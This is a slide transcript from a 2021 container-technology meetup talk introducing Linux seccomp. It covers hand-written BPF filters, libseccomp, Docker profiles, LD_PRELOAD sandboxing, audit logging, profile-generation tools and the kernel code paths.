Introduction to Seccomp

mrtc0
April 17, 2021

2021.04.17 The 14th Container Technology Information Exchange Meeting @ Online (第14回 コンテナ技術の情報交換会@オンライン)
https://ct-study.connpass.com/event/205571/

Transcript

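  1. What is Seccomp: a history of Seccomp

    Linux Kernel 2.6.12: Seccomp is merged. At this point only read, write, exit, and sigreturn can be executed. It is controlled through /proc/pid/seccomp.
    Linux Kernel 2.6.23: Seccomp becomes controllable via prctl().
    Linux Kernel 3.5: Seccomp Mode 2 appears. Arbitrary system calls can be restricted, with filters based on BPF.
    Linux Kernel 3.17: seccomp(2) is added.
    The notation varies a lot (seccomp-bpf, seccomp, and so on).
    Seccomp Notify is added, allowing cooperation with user space. This is not an official name; it is also called "Seccomp trap to userspace".
    These are the recent changes that I personally consider significant.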
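  2. How Seccomp works

    ・Seccomp performs a check every time a system call is invoked.
    ・Seccomp filters are inherited by child processes.
    ・If the call is not permitted, a predefined action is executed.
    ・Typically the system call is stopped and SIGSYS is delivered.

    [Diagram: user space / kernel space]
    A process calls read(2). Seccomp 👮 approves read(2), the call runs, and the return value is passed back to the process.
    A process calls execve(2). Seccomp 👮 rejects execve(2), so execve(2) is not executed and SIGSYS or another predefined action is carried out. Depending on the action, the call may still be executed.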
  3. Seccomp Examples: Seccomp in Docker

    Docker is a handy way to experience how Seccomp behaves.
    The profile below allows every system call by default ("defaultAction": "SCMP_ACT_ALLOW") and forbids only mkdir(2) ("action": "SCMP_ACT_ERRNO").

        $ cat seccomp.json
        {
          "defaultAction": "SCMP_ACT_ALLOW",
          "syscalls": [
            {
              "name": "mkdir",
              "action": "SCMP_ACT_ERRNO"
            }
          ]
        }
        $ docker run --rm -it --security-opt seccomp=seccomp.json ubuntu:20.04 bash
        root@ab9ad7d57f7f:/# mkdir /tmp/test
        mkdir: cannot create directory '/tmp/test': Operation not permitted
  4. Seccomp Examples: man 2 seccomp

        int seccomp(unsigned int operation, unsigned int flags, void *args);

    A process uses seccomp(2) to apply Seccomp to itself.
    operation takes one of the following values:
    SECCOMP_SET_MODE_STRICT ... permits only read(2), write(2), _exit(2), and sigreturn(2).
    SECCOMP_SET_MODE_FILTER ... restricts arbitrary system calls and their arguments with a filter written in BPF.
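As a rough illustration of SECCOMP_SET_MODE_STRICT, the sketch below forks a child, switches it to strict mode, and has it call getpid(2), which is outside the four permitted calls. The helper name `strict_mode_child_signal` and its return convention (-1 when strict mode cannot be enabled) are assumptions made for this example, not something taken from the slides.

```c
#define _GNU_SOURCE
#include <linux/seccomp.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical helper: returns the signal that terminated a child which
 * entered strict mode and then called getpid(2), or -1 if strict mode
 * could not be enabled or the child did not die from a signal.
 */
int strict_mode_child_signal(void)
{
    pid_t pid = fork();
    if (pid == -1)
        return -1;

    if (pid == 0) {
        /* Child: after this call only read, write, _exit and sigreturn are allowed. */
        if (syscall(SYS_seccomp, SECCOMP_SET_MODE_STRICT, 0, NULL) != 0)
            _exit(2);            /* strict mode is unavailable here */
        syscall(SYS_getpid);     /* not on the allow list, so the kernel kills the child */
        syscall(SYS_exit, 0);    /* only reached if the kill did not happen */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFSIGNALED(status) ? WTERMSIG(status) : -1;
}
```

On a kernel where strict mode is available, the helper is expected to report SIGKILL, because strict mode terminates the thread on any other system call. The fork keeps the calling process itself unrestricted.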
  5. seccomp(2)

    As a sample, we build a program in which uname(2) is forbidden.
    1. Prepare the code to be sandboxed
    2. Prepare a function that calls seccomp(2)
    3. Define the BPF filter
    4. Apply seccomp(2)

        #include <stdio.h>
        #include <sys/utsname.h>

        int main(void)
        {
            struct utsname name;

            if (uname(&name)) {
                perror("uname failed");
                return 1;
            }
            printf("uname: %s\n", name.sysname);
            return 0;
        }

        $ ./uname
        => Linux
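  6. seccomp(2)

    Before the code that should run under Seccomp, add a call to a sandbox() function that executes seccomp(2).
    1. Prepare the code to be sandboxed
    2. Prepare a function that calls seccomp(2)
    3. Define the BPF filter
    4. Apply seccomp(2)

        ...
        sandbox();  // added
        if (uname(&name)) {
            perror("uname failed");
            return 1;
        }
        ...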
  7. seccomp(2)

    1. Prepare the code to be sandboxed
    2. Prepare a function that calls seccomp(2)
    3. Define the BPF filter
    4. Apply seccomp(2)

        // Definition of the seccomp BPF filter
        struct sock_filter filter[] = {
            // 1. Load the value of the arch field from struct seccomp_data.
            //    System call numbers differ between architectures,
            //    so the architecture must always be checked.
            BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, arch))),
            // 2. If it is not x86_64, return SECCOMP_RET_KILL
            BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 4),
            // 3. Load the value of the nr field from struct seccomp_data.
            //    This field holds the system call number.
            BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))),
            // 4. If it is uname(2), return EPERM through SECCOMP_RET_ERRNO;
            //    otherwise allow the call
            BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_uname, 0, 1),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
        };
  8. seccomp(2)

    1. Prepare the code to be sandboxed
    2. Prepare a function that calls seccomp(2)
    3. Define the BPF filter
    4. Apply seccomp(2)

        struct sock_fprog prog = {
            .len = (unsigned short) (sizeof(filter) / sizeof(filter[0])),
            .filter = filter,
        };

        // SECCOMP_SET_MODE_FILTER requires either CAP_SYS_ADMIN or
        // no_new_privs on the calling thread, so set no_new_privs
        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
            perror("PR_SET_NO_NEW_PRIVS failed");
            exit(1);
        }

        // Invoke the seccomp system call
        if (syscall(SYS_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog)) {
            perror("seccomp failed");
            exit(1);
        }

        $ ./uname_with_seccomp
        uname failed: Operation not permitted
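The four steps can be put together into one compilable unit. The sketch below reuses the filter and the prctl/seccomp calls from the slides, but runs them in a forked child so that the calling process stays unsandboxed. The function `uname_errno_in_sandboxed_child` and its return codes (200 when the filter cannot be installed, -1 when the child is killed) are hypothetical, and the filter assumes an x86_64 host as in the slides.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <unistd.h>

/* Installs the uname(2)-denying filter from the slides. Returns 0 on success. */
static int sandbox(void)
{
    struct sock_filter filter[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 4),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_uname, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    };
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof(filter) / sizeof(filter[0])),
        .filter = filter,
    };

    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
        return -1;
    if (syscall(SYS_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog))
        return -1;
    return 0;
}

/*
 * Hypothetical helper: runs uname(2) in a sandboxed child and returns the
 * errno the child observed (0 if uname succeeded), 200 if the filter could
 * not be installed, or -1 if the child was killed or could not be waited for.
 */
int uname_errno_in_sandboxed_child(void)
{
    pid_t pid = fork();
    if (pid == -1)
        return -1;

    if (pid == 0) {
        struct utsname name;
        if (sandbox() != 0)
            _exit(200);
        _exit(uname(&name) == 0 ? 0 : errno);  /* exit_group is still allowed */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

On an x86_64 kernel with seccomp filtering available, the child should see EPERM from uname(2), which matches the "Operation not permitted" message above.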
  9. Seccomp Examples: Reading BPF

    So what does BPF actually look like? Let's take a look.
    The `-d` option of tcpdump prints the BPF bytecode and instructions.

        $ sudo tcpdump -d icmp
        (000) ldh [12]                  // load the halfword at byte offset 12 from the start of the packet
        (001) jeq #0x800 jt 2 jf 5      // if the loaded value is 0x800, go to 2
        (002) ldb [23]                  // load the byte at offset 23
        (003) jeq #0x1 jt 4 jf 5        // if the loaded value is 0x1, go to 4
        (004) ret #262144
        (005) ret #0
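To make the listing easier to follow, here is a hand translation of the six instructions into plain C. It is only a sketch: `icmp_filter` is a hypothetical name, and the interpretation of the offsets (byte 12 is the EtherType of an Ethernet frame, byte 23 is the IPv4 protocol field) is background knowledge rather than something stated on the slide.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Hand translation of the program printed by `tcpdump -d icmp`.
 * Returns the number of bytes to capture (262144) or 0 to drop the packet.
 */
uint32_t icmp_filter(const uint8_t *pkt, size_t len)
{
    uint32_t a;  /* the A (accumulator) register */

    /* Classic BPF returns 0 when a load reaches past the end of the packet. */
    if (len < 24)
        return 0;

    a = ((uint32_t)pkt[12] << 8) | pkt[13];  /* (000) ldh [12], big-endian halfword */
    if (a != 0x800)                          /* (001) jeq #0x800 jt 2 jf 5 */
        return 0;                            /* (005) ret #0 */

    a = pkt[23];                             /* (002) ldb [23] */
    if (a != 0x1)                            /* (003) jeq #0x1 jt 4 jf 5 */
        return 0;                            /* (005) ret #0 */

    return 262144;                           /* (004) ret #262144 */
}
```

A frame whose EtherType is 0x0800 (IPv4) and whose protocol byte is 1 (ICMP) is accepted; anything else is dropped.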
  10. Seccomp Examples: Reading BPF

    (Repeats the `sudo tcpdump -d icmp` listing and explanation from slide 9.)
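  11. Seccomp Examples: Reading BPF

    The instruction set is documented in Documentation/networking/filter.txt.
    For example, the filter defined earlier for uname(2) can be read as follows.

        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, arch))),

    LD* loads into the A (accumulator) register.
    BPF_W is a size modifier meaning word size (4 bytes).
    BPF_ABS is a mode modifier meaning absolute addressing.
    So this means A = P[k:4], that is, load arch into the register.

        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 4),

    JEQ means dst == src.
    BPF_K denotes an immediate value.
    So this becomes A == AUDIT_ARCH_X86_64 ? 0 : 4, where 0 and 4 are the number of instructions to skip when the comparison is true or false.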
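One way to check this reading is to evaluate the filter by hand. The sketch below is a deliberately tiny user-space interpreter that understands only the three instruction forms used by the uname(2) filter (LD W ABS, JEQ K, RET K). The names `run_filter` and `evaluate` are hypothetical; the real evaluation happens inside the kernel, and this is not how the kernel implements it.

```c
#include <errno.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>

/* The uname(2) filter from the earlier slide. */
static const struct sock_filter uname_filter[] = {
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 4),
    BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_uname, 0, 1),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
};

/* Interprets a filter built from LD|W|ABS, JMP|JEQ|K and RET|K only. */
uint32_t run_filter(const struct sock_filter *f, size_t len,
                    const struct seccomp_data *sd)
{
    uint32_t a = 0;  /* the A (accumulator) register */

    for (size_t pc = 0; pc < len; pc++) {
        const struct sock_filter *insn = &f[pc];

        switch (insn->code) {
        case BPF_LD | BPF_W | BPF_ABS:   /* A = P[k:4] */
            if (insn->k > sizeof(*sd) - sizeof(a))
                return SECCOMP_RET_KILL;
            memcpy(&a, (const unsigned char *)sd + insn->k, sizeof(a));
            break;
        case BPF_JMP | BPF_JEQ | BPF_K:  /* skip jt or jf instructions */
            pc += (a == insn->k) ? insn->jt : insn->jf;
            break;
        case BPF_RET | BPF_K:            /* return the immediate value */
            return insn->k;
        default:                         /* not supported by this sketch */
            return SECCOMP_RET_KILL;
        }
    }
    return SECCOMP_RET_KILL;
}

/* Evaluates the uname filter for a given architecture and syscall number. */
uint32_t evaluate(uint32_t arch, int nr)
{
    struct seccomp_data sd;

    memset(&sd, 0, sizeof(sd));
    sd.arch = arch;
    sd.nr = nr;
    return run_filter(uname_filter,
                      sizeof(uname_filter) / sizeof(uname_filter[0]), &sd);
}
```

With this model, `evaluate(AUDIT_ARCH_X86_64, SYS_uname)` ends at the SECCOMP_RET_ERRNO instruction, any other syscall number on x86_64 ends at SECCOMP_RET_ALLOW, and any other architecture jumps four instructions ahead to SECCOMP_RET_KILL.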
  12. libseccomp (seccomp → libseccomp)

    ・A library that provides an interface for writing Seccomp filters easily.
    ・It absorbs the differences between architectures (x86, ARM, MIPS, etc.).
    ・The man page also recommends writing filters with libseccomp:

    > Rather than hand-coding seccomp filters as shown in the example
    > below, you may prefer to employ the libseccomp library, which
    > provides a front-end for generating seccomp filters.

    https://man7.org/linux/man-pages/man2/seccomp.2.html
  13. libseccomp (seccomp → libseccomp)

    ・The sandbox() function that restricts uname(2) can be rewritten as follows.

        // Allow all system calls by default
        scmp_filter_ctx seccomp_ctx = seccomp_init(SCMP_ACT_ALLOW);
        if (!seccomp_ctx)
            err(1, "seccomp_init failed");

        // Kill if the system call is uname
        if (seccomp_rule_add_exact(seccomp_ctx, SCMP_ACT_KILL,
                                   seccomp_syscall_resolve_name("uname"), 0)) {
            perror("seccomp_rule_add_exact failed");
            exit(1);
        }

        // Apply the filter
        if (seccomp_load(seccomp_ctx)) {
            perror("seccomp_load failed");
            exit(1);
        }
        seccomp_release(seccomp_ctx);
  14. How the process terminates

    Did you notice that the process terminates differently depending on whether libseccomp is used?

        $ ./uname_with_seccomp
        uname failed: Operation not permitted 👈

        $ ./uname_with_libseccomp
        Bad system call (core dumped) 👈

        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SYS_uname, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA)),

        $ sudo strace ./uname_with_libseccomp
        ...
        uname( <unfinished ...>) = ?
        +++ killed by SIGSYS (core dumped) +++
        Bad system call

    The former sets EPERM and the program handles the error itself.
    The libseccomp version, which uses SCMP_ACT_KILL, is terminated by SIGSYS instead.
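  15. How the process terminates

    Handling the error yourself is more flexible, but a case like the following is also conceivable.

        ...
        sandbox();  // forbid read(2)

        // Even if read(2) fails, bypass the restriction with pread(2)
        size = read(fd, buf, sizeof(buf));
        if (size == -1) {
            perror("read(2) failed ");
            size = pread(fd, buf, sizeof(buf), 0);
            if (size == -1) {
                perror("pread(2) failed ");
        ...

    Preparing a complete filter is difficult.
    Terminating immediately with SIGSYS has the advantage of leaving an attacker no room for such a bypass.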
  16. LD_PRELOAD

    Set up Seccomp with the GCC extension __attribute__((constructor)).

        /* seccomp.c */
        #include <stdio.h>
        #include <seccomp.h>

        __attribute__((constructor))
        void configure_seccomp(void)
        {
            ...
            if (seccomp_rule_add_exact(seccomp_ctx, SCMP_ACT_KILL,
                                       seccomp_syscall_resolve_name("uname"), 0)) {
                perror("seccomp_rule_add_exact failed");
            }
            ...
            printf("Configuring seccomp\n");
            ...
        }

        $ gcc -shared -fPIC -o seccomp.so seccomp.c -lseccomp
        $ env LD_PRELOAD=./seccomp.so uname -a
        Configuring seccomp
        fish: “env LD_PRELOAD=./seccomp.so una…” terminated by signal SIGSYS (Bad system call)

    However, LD_PRELOAD does not work for statically linked binaries.

        $ gcc uname.c -static -o uname-static
        $ env LD_PRELOAD=./seccomp.so ./uname-static
        uname: Linux
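The reason the LD_PRELOAD approach works is that a function marked with __attribute__((constructor)) runs when the object is loaded, before main() starts. The following minimal sketch shows only that ordering, with a counter standing in for the filter setup; `configure_early` and `constructor_ran_before_main` are hypothetical names.

```c
/* Counts how many times the constructor has run. */
static int constructor_calls = 0;

/*
 * Runs at load time, before main(). In the slide's seccomp.c this is the
 * place where the seccomp filter is installed.
 */
__attribute__((constructor))
static void configure_early(void)
{
    constructor_calls++;
}

/* Returns 1 once the constructor has run, which is already true inside main(). */
int constructor_ran_before_main(void)
{
    return constructor_calls;
}
```

Calling `constructor_ran_before_main()` as the first statement of main() should already return 1, which is why a preloaded shared object can restrict a dynamically linked program without modifying it.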
  17. cloudflare/sandbox

    A more general-purpose version of the LD_PRELOAD method shown earlier.
    It works by specifying the system calls to allow or deny in environment variables.

        $ env LD_PRELOAD=./libsandbox.so SECCOMP_SYSCALL_DENY="uname" uname -a
        initializing seccomp with default action (allow)
        adding uname to the process seccomp filter (kill process)
        fish: 'env LD_PRELOAD=./libsandbox.so…' terminated by signal SIGSYS (Bad system call)

    https://github.com/cloudflare/sandbox

    For statically linked binaries it provides a tool called sandboxify, which simply does fork and exec.

        # env SECCOMP_SYSCALL_DENY="uname" ./sandboxify ./uname-static
        initializing seccomp with default action (allow)
        adding uname to the process seccomp filter (kill process)
        fish: 'sudo env SECCOMP_SYSCALL_DENY="…' terminated by signal SIGSYS (Bad system call)

    The same approach as sandboxify is also possible with systemd.

        [Service]
        ExecStart = /path/to/uname
        SystemCallFilter = openat uname brk arch_prctl readlink access fstat write exit_group mmap close read mprotect munmap
  18. LD_PRELOAD vs sandboxify

    With an approach like sandboxify, the policy may end up looser.

        $ strace ./uname-static
        execve("/home/ubuntu/seccomp/uname-static", ["/home/ubuntu/secco...
        brk(NULL) = 0xba2000
        brk(0xba31c0) = 0xba31c0
        arch_prctl(ARCH_SET_FS, 0xba2880) = 0
        uname({sysname="Linux", nodename="sandbox", ...}) = 0
        readlink("/proc/self/exe", "/home/ubuntu/seccomp/uname-stati"..., 4096) = 33
        brk(0xbc41c0) = 0xbc41c0
        brk(0xbc5000) = 0xbc5000
        access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
        uname({sysname="Linux", nodename="sandbox", ...}) = 0
        fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ...}) = 0
        write(1, "Linux\n", 6Linux

    With the LD_PRELOAD approach the filter is applied before main(), whereas with an approach like sandboxify the system calls executed during runtime initialization must be allowed as well.

    https://blog.cloudflare.com/sandboxing-in-linux-with-zero-lines-of-code/
  19. Docker

    Seccomp can be configured for applications that run in containers.
    The profile below allows every system call by default ("defaultAction": "SCMP_ACT_ALLOW") and forbids only mkdir(2) ("action": "SCMP_ACT_ERRNO").

        $ cat seccomp.json
        {
          "defaultAction": "SCMP_ACT_ALLOW",
          "syscalls": [
            {
              "name": "mkdir",
              "action": "SCMP_ACT_ERRNO"
            }
          ]
        }
        $ docker run --rm -it --security-opt seccomp=seccomp.json ubuntu:20.04 bash
        root@ab9ad7d57f7f:/# mkdir /tmp/test
        mkdir: cannot create directory '/tmp/test': Operation not permitted

    Many other container runtimes, such as LXD, support Seccomp as well.
  20. SECCOMP_RET_LOG / SCMP_ACT_LOG

    From Linux Kernel 4.14 onward, the SECCOMP_RET_LOG action can write log entries to auditd.

        struct sock_filter filter[] = {
            BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, arch))),
            BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 2),
            BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_LOG),
            BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
        };

        // libseccomp
        scmp_filter_ctx seccomp_ctx = seccomp_init(SCMP_ACT_LOG);
        if (!seccomp_ctx)
            err(1, "seccomp_init failed");
        if (seccomp_load(seccomp_ctx)) {
            perror("seccomp_load failed");
            exit(1);
        }

        $ tail -f /var/log/audit/audit.log
        type=SECCOMP msg=audit(1618574663.331:1719): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=39 ...
        type=SECCOMP msg=audit(1618574663.331:1720): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=63 ...
        type=SECCOMP msg=audit(1618574663.331:1721): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=5 ...
        type=SECCOMP msg=audit(1618574663.331:1722): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=1 ...
        type=SECCOMP msg=audit(1618574663.331:1723): ... comm="a.out" exe="/home/ubuntu/seccomp/logging/a.out" sig=0 arch=c000003e syscall=231 ...
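The audit records carry only syscall numbers, so turning them into a profile means extracting the `syscall=` field and mapping it to a name. The sketch below shows one way to do that; `audit_syscall_nr` and `x86_64_syscall_name` are hypothetical helpers, and the table is hand-written for the five x86_64 numbers that appear in the log above (arch=c000003e is AUDIT_ARCH_X86_64), not a complete mapping.

```c
#include <stdlib.h>
#include <string.h>

/*
 * Returns the value of the syscall= field of a type=SECCOMP audit record,
 * or -1 if the field is missing or not a number.
 */
long audit_syscall_nr(const char *record)
{
    static const char key[] = " syscall=";
    const char *p = strstr(record, key);
    char *end;
    long nr;

    if (p == NULL)
        return -1;
    p += strlen(key);
    nr = strtol(p, &end, 10);
    return end == p ? -1 : nr;
}

/* Names for the x86_64 syscall numbers seen in the sample log only. */
const char *x86_64_syscall_name(long nr)
{
    switch (nr) {
    case 1:   return "write";
    case 5:   return "fstat";
    case 39:  return "getpid";
    case 63:  return "uname";
    case 231: return "exit_group";
    default:  return "unknown";
    }
}
```

Applied to the second record in the log, this yields 63, that is, uname. A real tool would more likely resolve names with libseccomp or the audit userspace utilities than with a fixed table.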
  21. eBPF

    ・Trace system call invocations with eBPF and build a profile from them.

        # ./execsnoop
        PCOMM    PID    RET ARGS
        bash     15887  0   /usr/bin/man ls
        preconv  15894  0   /usr/bin/preconv -e UTF-8
        man      15896  0   /usr/bin/tbl
        man      15897  0   /usr/bin/nroff -mandoc -rLL=169n -rLT=169n -Tutf8
        man      15898  0   /usr/bin/pager -s
        nroff    15900  0   /usr/bin/locale charmap
        nroff    15901  0   /usr/bin/groff -mtty-char -Tutf8 -mandoc -rLL=169n -rLT=169n
        groff    15902  0   /usr/bin/troff -mtty-char -mandoc -rLL=169n -rLT=169n -Tutf8
        groff    15903  0   /usr/bin/grotty

    ・eBPF is short for extended BPF, a technology for kernel tracing.
    ・For details, see the Software Design magazine issues.
  22. OCI seccomp bpf hook

        $ sudo podman run --annotation io.containers.trace-syscall=of:/tmp/uname.json ubuntu:latest uname
        $ cat /tmp/uname.json | jq
        {
          "defaultAction": "SCMP_ACT_ERRNO",
          "architectures": [
            "SCMP_ARCH_X86_64"
          ],
          "syscalls": [
            {
              "names": [
                "access",
                "arch_prctl",
                "brk",
                "capset",
                "close",
                "execve",
                "exit_group"
                ...

    It uses the prestart hook of the OCI runtime hooks (OCI hook) to trace with an eBPF program from just before the container's init process starts.

    https://github.com/opencontainers/runtime-spec/blob/master/config.md#prestart
    https://github.com/containers/oci-seccomp-bpf-hook
  23. docker-slim

        ubuntu@sandbox ~> docker-slim build ubuntu:latest --http-probe=false
        ...
        cmd=build info=results status='MINIFIED' by='19.62X' size.original='73 MB' size.optimized='3.7 MB'
        cmd=build info=results image.name='ubuntu.slim' image.size='3.7 MB' has.data='true'
        cmd=build info=results artifacts.location='/tmp/docker-slim-state/.docker-slim-state/images/.../artifacts'
        cmd=build info=results artifacts.report='creport.json'
        cmd=build info=results artifacts.dockerfile.reversed='Dockerfile.fat'
        cmd=build info=results artifacts.dockerfile.optimized='Dockerfile'
        cmd=build info=results artifacts.seccomp='ubuntu-seccomp.json'
        cmd=build info=results artifacts.apparmor='ubuntu-apparmor-profile'
        ubuntu@sandbox ~> cat /tmp/docker-slim-state/.docker-slim-state/images/.../artifacts/ubuntu-seccomp.json
        {
          "defaultAction": "SCMP_ACT_ERRNO",
          "architectures": [
            "SCMP_ARCH_X86_64"
          ],
          "syscalls": [
            {
              "names": [
                "uname",
                "chdir",
                "execve",
                "read",
                ...

    A tool that makes heavy use of ptrace(2) to generate AppArmor and Seccomp profiles.

    https://github.com/docker-slim/docker-slim
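  24. [Repeated] How Seccomp works

    ・Seccomp performs a check every time a system call is invoked.
    ・If the call is not permitted, a predefined action is executed.
    ・Typically the system call is stopped and SIGSYS is delivered.

    [Diagram: user space / kernel space]
    A process calls read(2). Seccomp 👮 approves read(2), the call runs, and the return value is passed back to the process.
    A process calls execve(2). Seccomp 👮 rejects execve(2), so execve(2) is not executed and SIGSYS or another predefined action is carried out. Depending on the action, the call may still be executed.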
  25. Following the Seccomp code path: auditing the system call

    The check really is executed right before the system call is invoked.

        /*
         * Returns the syscall nr to run (which should match regs->orig_ax) or -1
         * to skip the syscall.
         */
        static long syscall_trace_enter(struct pt_regs *regs)
        {
            u32 arch = in_ia32_syscall() ? AUDIT_ARCH_I386 : AUDIT_ARCH_X86_64;
            ...
            if (work & _TIF_SECCOMP) {
                struct seccomp_data sd;

                sd.arch = arch;
                sd.nr = regs->orig_ax;
                sd.instruction_pointer = regs->ip;
                ...
                ret = __secure_computing(&sd);
                if (ret == -1)
                    return ret;

    do_syscall_64() -> syscall_trace_enter() -> __secure_computing()
  26. Following the Seccomp code path: auditing the system call

    Here too, processing branches on the mode.

        int __secure_computing(const struct seccomp_data *sd)
        {
            int mode = current->seccomp.mode;
            int this_syscall;

            if (IS_ENABLED(CONFIG_CHECKPOINT_RESTORE) &&
                unlikely(current->ptrace & PT_SUSPEND_SECCOMP))
                return 0;

            this_syscall = sd ? sd->nr :
                syscall_get_nr(current, task_pt_regs(current));

            switch (mode) {
            case SECCOMP_MODE_STRICT:
                __secure_computing_strict(this_syscall);  /* may call do_exit */
                return 0;
            case SECCOMP_MODE_FILTER:
                return __seccomp_filter(this_syscall, sd, false);
            default:
                BUG();
            }
        }

    __seccomp_filter() -> seccomp_run_filters() -> BPF_PROG_RUN()

    After evaluation, processing branches on the action given by the filter's return value.

        filter_ret = seccomp_run_filters(sd, &match);
        data = filter_ret & SECCOMP_RET_DATA;
        action = filter_ret & SECCOMP_RET_ACTION_FULL;

        switch (action) {
        case SECCOMP_RET_ERRNO:
            /* Set low-order bits as an errno, capped at MAX_ERRNO. */
            if (data > MAX_ERRNO)
                data = MAX_ERRNO;
            syscall_set_return_value(current, task_pt_regs(current), -data, 0);
            goto skip;
        case SECCOMP_RET_TRAP:
            ...
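The split of the filter's 32-bit return value into an action and a data part can be tried in user space. The sketch below mirrors the two masks and the MAX_ERRNO cap from the kernel excerpt; `struct filter_verdict`, `split_filter_ret`, and `SKETCH_MAX_ERRNO` are hypothetical names introduced for this example, and the fallback definition of SECCOMP_RET_ACTION_FULL is an assumption for older kernel headers.

```c
#include <linux/seccomp.h>
#include <stdint.h>

/* Older kernel headers may lack this mask; assume the upstream value. */
#ifndef SECCOMP_RET_ACTION_FULL
#define SECCOMP_RET_ACTION_FULL 0xffff0000U
#endif

/* The kernel caps errno values at MAX_ERRNO (4095). */
#define SKETCH_MAX_ERRNO 4095U

/* Hypothetical container for the two halves of a filter return value. */
struct filter_verdict {
    uint32_t action;  /* upper 16 bits, e.g. SECCOMP_RET_ERRNO */
    uint32_t data;    /* lower 16 bits, e.g. the errno to report */
};

/* Splits a filter return value the same way the excerpt above does. */
struct filter_verdict split_filter_ret(uint32_t filter_ret)
{
    struct filter_verdict v;

    v.data = filter_ret & SECCOMP_RET_DATA;
    v.action = filter_ret & SECCOMP_RET_ACTION_FULL;

    /* For SECCOMP_RET_ERRNO the data part is an errno, capped at MAX_ERRNO. */
    if (v.action == SECCOMP_RET_ERRNO && v.data > SKETCH_MAX_ERRNO)
        v.data = SKETCH_MAX_ERRNO;
    return v;
}
```

For the value `SECCOMP_RET_ERRNO | EPERM` used in the uname(2) filter, this gives the action SECCOMP_RET_ERRNO and the data 1, which the kernel then sets as the negated return value of the skipped system call.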
  27. Must not allow use of ptrace(2) (man 2 seccomp)

    Before kernel 4.8, the seccomp check will
    not be run again after the tracer is notified. (This means that, on older kernels, seccomp-based sandboxes must not allow use of ptrace(2)—even of other sandboxed processes—without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.)
  28. Do seccomp after ptrace

    Reading the Seccomp code, you find the following comment.

        static long syscall_trace_enter(struct pt_regs *regs)
        {
            u32 arch = in_ia32_syscall() ? AUDIT_ARCH_I386 : AUDIT_ARCH_X86_64;
            struct thread_info *ti = current_thread_info();
            unsigned long ret = 0;
            bool emulated = false;
            u32 work;
            ...
            /*
             * Do seccomp after ptrace, to catch any tracer changes.
             */
            if (work & _TIF_SECCOMP) {
                struct seccomp_data sd;

                sd.arch = arch;
                sd.nr = regs->orig_ax;
                sd.instruction_pointer = regs->ip;
  29. Differences in the call sequence

